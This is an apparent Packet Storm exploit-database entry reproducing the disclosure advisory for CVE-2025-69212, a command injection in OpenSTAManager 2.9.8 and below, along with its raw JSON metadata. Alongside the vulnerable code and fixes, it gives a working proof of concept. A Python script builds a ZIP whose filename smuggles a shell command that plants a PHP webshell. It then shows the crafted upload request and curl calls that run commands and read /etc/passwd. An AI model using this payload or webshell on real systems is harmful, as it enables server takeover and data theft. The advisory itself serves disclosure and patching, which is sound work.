📄 OpenSTAManager 2.9.8 Command Injection_PACKETSTORM:218760

9.4 / 10

CRITICAL

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/SC:H/VI:H/SI:H/VA:H/SA:H

Description

OpenSTAManager versions 2.9.8 and below suffer from a command injection vulnerability via the P7M file processing functionality...

Visit Original Source

Basic Information

ID PACKETSTORM:218760

Published Apr 13, 2026 at 00:00

Affected Product

Affected Versions # CVE-2025-69212: OpenSTAManager has an OS Command Injection in P7M File Processing

## Overview

| Field | Details |
|---|---|
| **CVE ID** | [CVE-2025-69212](https://nvd.nist.gov/vuln/detail/CVE-2025-69212) |
| **Severity** | CRITICAL |
| **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36) |
| **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |

## Affected Products

- **devcode-it/openstamanager** (versions: <= 2.9.8)

## CWE Classification

- CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

## Details

## Summary
A critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.

## Vulnerable Code
**File:** `src/Util/XML.php:100`

```php
public static function decodeP7M($file)
{
$directory = pathinfo($file, PATHINFO_DIRNAME);
$content = file_get_contents($file);

$output_file = $directory.'/'.basename($file, '.p7m');

try {
if (function_exists('exec')) {
// VULNERABLE - No input sanitization!
exec('openssl smime -verify -noverify -in "'.$file.'" -inform DER -out "'.$output_file.'"', $output, $cmd);
```

**The Problem:**
- The `$file` parameter is passed directly into `exec()` without sanitization
- Although wrapped in double quotes, an attacker can escape them
- The filename comes from uploaded ZIP archives (user-controlled)

## Attack Vector

### Entry Points:
1. **plugins/importFE_ZIP/actions.php:126** (when automatic import is enabled)
```php
foreach ($files_xml as $xml) {
if (string_ends_with($xml, '.p7m')) {
$file = XML::decodeP7M($directory.'/'.$xml); // $xml from ZIP!
```

2. **plugins/importFE/src/FatturaElettronica.php:56** (constructor)
```php
if (string_ends_with($name, '.p7m')) {
$file = XML::decodeP7M($this->file); // $name from user input!
```

### Attack Flow:
1. Attacker creates ZIP with malicious filename
2. Upload ZIP via importFE_ZIP plugin
3. Application extracts ZIP and iterates files
4. For `.p7m` files, `decodeP7M()` is called
5. Malicious filename is injected into `exec()` command
6. Arbitrary command executes as web server user

## Proof of Concept

**⚠️ IMPORTANT NOTE:** PHP's `ZipArchive::extractTo()` splits filenames on `/` character. Payload must NOT contain `/` in commands. Use `cd directory && command` instead of absolute paths.

### Step 1: Create Malicious ZIP

```python
import zipfile

cmd = "cd files && echo '<?php system($_GET[\"c\"]); ?>' > SHELL.php"
malicious_filename = f'invoice.p7m";{cmd};echo ".p7m'

with zipfile.ZipFile('exploit.zip', 'w') as zf:
zf.writestr(malicious_filename, b"DUMMY_P7M_CONTENT")
```

### Step 2: Upload ZIP

```http
POST /actions.php HTTP/1.1
Host: localhost:8081
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBKunENXxjEx5VrRc
Cookie: PHPSESSID=10fcc3c3cdccf2466ada216d5839084b

------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="blob1"; filename="exploit.zip"
Content-Type: application/zip

[ZIP CONTENT]
------WebKitFormBoundaryBKunENXxjEx5VrRc--
Content-Disposition: form-data; name="op"

save

------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="id_module"

14
------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="id_plugin"

48
------WebKitFormBoundaryBKunENXxjEx5VrRc--
```
<img width="2539" height="809" alt="image" src="https://github.com/user-attachments/assets/f39cf6ad-9e8d-41de-866e-e01ec2064fd1" />

<img width="1543" height="659" alt="image" src="https://github.com/user-attachments/assets/41fbd038-0bce-4b1c-bdc3-8ddcf3bf13be" />

### Step 3: Exploitation Result

**Response (500 error is expected - XML parsing fails AFTER command execution):**
```http
HTTP/1.1 500 Internal Server Error
{"error":{"type":"Exception","message":"Start tag expected, '<' not found"}}
```

**Verification - Webshell Created:**

<img width="1111" height="239" alt="image" src="https://github.com/user-attachments/assets/d2e36cf3-c438-4509-be46-36d5c6f3e0d1" />

### Step 4: Remote Code Execution

**Webshell is publicly accessible without authentication:**

```bash
$ curl "http://localhost:8081/files/SHELL.php?c=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ curl "http://localhost:8081/files/SHELL.php?c=cat+/etc/passwd"
[Full /etc/passwd output]
```
<img width="698" height="475" alt="image" src="https://github.com/user-attachments/assets/7ee4630b-95a8-450c-bdce-d6f703c8168d" />

## Impact

- **Remote Code Execution:** Full server compromise
- **Data Exfiltration:** Access to all application data and database
- **Privilege Escalation:** Potential escalation if web server runs with elevated privileges
- **Persistence:** Install backdoors and maintain access
- **Lateral Movement:** Pivot to other systems on the network

## Prerequisites

- Authenticated user with access to invoice import functionality

## Remediation

### Input Sanitization

```php
public static function decodeP7M($file)
{
// Validate that file path doesn't contain shell metacharacters
if (preg_match('/[;&|`$(){}\\[\\]<>]/', $file)) {
throw new \Exception('Invalid file path');
}

// Better: use escapeshellarg()
$safe_file = escapeshellarg($file);
$safe_output = escapeshellarg($output_file);

exec("openssl smime -verify -noverify -in $safe_file -inform DER -out $safe_output", $output, $cmd);
}
```
or

### Validate Filename Before Processing

```php
// In the upload handler, validate filenames from ZIP
foreach ($files_xml as $xml) {
// Only allow alphanumeric, dots, dashes, underscores
if (!preg_match('/^[a-zA-Z0-9._-]+$/', $xml)) {
continue; // Skip invalid filenames
}

if (string_ends_with($xml, '.p7m')) {
$file = XML::decodeP7M($directory.'/'.$xml);
}
}
```

## Credit
Discovered by: Łukasz Rybak

## References

- https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36
- https://nvd.nist.gov/vuln/detail/CVE-2025-69212
- https://github.com/advisories/GHSA-25fp-8w8p-mx36

## Disclaimer

This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.

{
    "lastseen": "2026-04-13T15:48:09",
    "description": "OpenSTAManager versions 2.9.8 and below suffer from a command injection vulnerability via the P7M file processing functionality...",
    "published": "2026-04-13T00:00:00",
    "modified": "2026-04-13T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:218760",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-69212"
    ],
    "sourceData": "# CVE-2025-69212: OpenSTAManager has an OS Command Injection in P7M File Processing\n    \n    ## Overview\n    \n    | Field | Details |\n    |---|---|\n    | **CVE ID** | [CVE-2025-69212](https://nvd.nist.gov/vuln/detail/CVE-2025-69212) |\n    | **Severity** | CRITICAL |\n    | **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36) |\n    | **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |\n    \n    ## Affected Products\n    \n    - **devcode-it/openstamanager** (versions: <= 2.9.8)\n    \n    \n    ## CWE Classification\n    \n    - CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\n    \n    ## Details\n    \n    ## Summary\n    A critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.\n    \n    \n    ## Vulnerable Code\n    **File:** `src/Util/XML.php:100`\n    \n    ```php\n    public static function decodeP7M($file)\n    {\n        $directory = pathinfo($file, PATHINFO_DIRNAME);\n        $content = file_get_contents($file);\n    \n        $output_file = $directory.'/'.basename($file, '.p7m');\n    \n        try {\n            if (function_exists('exec')) {\n                // VULNERABLE - No input sanitization!\n                exec('openssl smime -verify -noverify -in \"'.$file.'\" -inform DER -out \"'.$output_file.'\"', $output, $cmd);\n    ```\n    \n    **The Problem:**\n    - The `$file` parameter is passed directly into `exec()` without sanitization\n    - Although wrapped in double quotes, an attacker can escape them\n    - The filename comes from uploaded ZIP archives (user-controlled)\n    \n    ## Attack Vector\n    \n    ### Entry Points:\n    1. **plugins/importFE_ZIP/actions.php:126** (when automatic import is enabled)\n       ```php\n       foreach ($files_xml as $xml) {\n           if (string_ends_with($xml, '.p7m')) {\n               $file = XML::decodeP7M($directory.'/'.$xml);  // $xml from ZIP!\n       ```\n    \n    2. **plugins/importFE/src/FatturaElettronica.php:56** (constructor)\n       ```php\n       if (string_ends_with($name, '.p7m')) {\n           $file = XML::decodeP7M($this->file);  // $name from user input!\n       ```\n    \n    ### Attack Flow:\n    1. Attacker creates ZIP with malicious filename\n    2. Upload ZIP via importFE_ZIP plugin\n    3. Application extracts ZIP and iterates files\n    4. For `.p7m` files, `decodeP7M()` is called\n    5. Malicious filename is injected into `exec()` command\n    6. Arbitrary command executes as web server user\n    \n    ## Proof of Concept\n    \n    **\u26a0\ufe0f IMPORTANT NOTE:** PHP's `ZipArchive::extractTo()` splits filenames on `/` character. Payload must NOT contain `/` in commands. Use `cd directory && command` instead of absolute paths.\n    \n    ### Step 1: Create Malicious ZIP\n    \n    ```python\n    import zipfile\n    \n    cmd = \"cd files && echo '<?php system($_GET[\\\"c\\\"]); ?>' > SHELL.php\"\n    malicious_filename = f'invoice.p7m\";{cmd};echo \".p7m'\n    \n    with zipfile.ZipFile('exploit.zip', 'w') as zf:\n        zf.writestr(malicious_filename, b\"DUMMY_P7M_CONTENT\")\n    ```\n    \n    ### Step 2: Upload ZIP\n    \n    ```http\n    POST /actions.php HTTP/1.1\n    Host: localhost:8081\n    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBKunENXxjEx5VrRc\n    Cookie: PHPSESSID=10fcc3c3cdccf2466ada216d5839084b\n    \n    ------WebKitFormBoundaryBKunENXxjEx5VrRc\n    Content-Disposition: form-data; name=\"blob1\"; filename=\"exploit.zip\"\n    Content-Type: application/zip\n    \n    [ZIP CONTENT]\n    ------WebKitFormBoundaryBKunENXxjEx5VrRc--\n    Content-Disposition: form-data; name=\"op\"\n    \n    save\n    \n    ------WebKitFormBoundaryBKunENXxjEx5VrRc\n    Content-Disposition: form-data; name=\"id_module\"\n    \n    14\n    ------WebKitFormBoundaryBKunENXxjEx5VrRc\n    Content-Disposition: form-data; name=\"id_plugin\"\n    \n    48\n    ------WebKitFormBoundaryBKunENXxjEx5VrRc--\n    ```\n    <img width=\"2539\" height=\"809\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f39cf6ad-9e8d-41de-866e-e01ec2064fd1\" />\n    \n    <img width=\"1543\" height=\"659\" alt=\"image\" src=\"https://github.com/user-attachments/assets/41fbd038-0bce-4b1c-bdc3-8ddcf3bf13be\" />\n    \n    ### Step 3: Exploitation Result\n    \n    **Response (500 error is expected - XML parsing fails AFTER command execution):**\n    ```http\n    HTTP/1.1 500 Internal Server Error\n    {\"error\":{\"type\":\"Exception\",\"message\":\"Start tag expected, '<' not found\"}}\n    ```\n    \n    **Verification - Webshell Created:**\n    \n    <img width=\"1111\" height=\"239\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d2e36cf3-c438-4509-be46-36d5c6f3e0d1\" />\n    \n    ### Step 4: Remote Code Execution\n    \n    **Webshell is publicly accessible without authentication:**\n    \n    ```bash\n    $ curl \"http://localhost:8081/files/SHELL.php?c=id\"\n    uid=33(www-data) gid=33(www-data) groups=33(www-data)\n    \n    $ curl \"http://localhost:8081/files/SHELL.php?c=cat+/etc/passwd\"\n    [Full /etc/passwd output]\n    ```\n    <img width=\"698\" height=\"475\" alt=\"image\" src=\"https://github.com/user-attachments/assets/7ee4630b-95a8-450c-bdce-d6f703c8168d\" />\n    \n    \n    ## Impact\n    \n    - **Remote Code Execution:** Full server compromise\n    - **Data Exfiltration:** Access to all application data and database\n    - **Privilege Escalation:** Potential escalation if web server runs with elevated privileges\n    - **Persistence:** Install backdoors and maintain access\n    - **Lateral Movement:** Pivot to other systems on the network\n    \n    ## Prerequisites\n    \n    - Authenticated user with access to invoice import functionality\n    \n    ## Remediation\n    \n    ###  Input Sanitization\n    \n    ```php\n    public static function decodeP7M($file)\n    {\n        // Validate that file path doesn't contain shell metacharacters\n        if (preg_match('/[;&|`$(){}\\\\[\\\\]<>]/', $file)) {\n            throw new \\Exception('Invalid file path');\n        }\n    \n        // Better: use escapeshellarg()\n        $safe_file = escapeshellarg($file);\n        $safe_output = escapeshellarg($output_file);\n    \n        exec(\"openssl smime -verify -noverify -in $safe_file -inform DER -out $safe_output\", $output, $cmd);\n    }\n    ```\n    or\n    \n    ### Validate Filename Before Processing\n    \n    ```php\n    // In the upload handler, validate filenames from ZIP\n    foreach ($files_xml as $xml) {\n        // Only allow alphanumeric, dots, dashes, underscores\n        if (!preg_match('/^[a-zA-Z0-9._-]+$/', $xml)) {\n            continue; // Skip invalid filenames\n        }\n    \n        if (string_ends_with($xml, '.p7m')) {\n            $file = XML::decodeP7M($directory.'/'.$xml);\n        }\n    }\n    ```\n    \n    \n    ## Credit\n    Discovered by: \u0141ukasz Rybak\n    \n    ## References\n    \n    - https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-69212\n    - https://github.com/advisories/GHSA-25fp-8w8p-mx36\n    \n    \n    ## Disclaimer\n    \n    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.",
    "sourceHref": "https://packetstorm.news/download/218760",
    "cvss": {
        "score": 9.4,
        "severity": "CRITICAL",
        "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/SC:H/VI:H/SI:H/VA:H/SA:H",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/218760/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply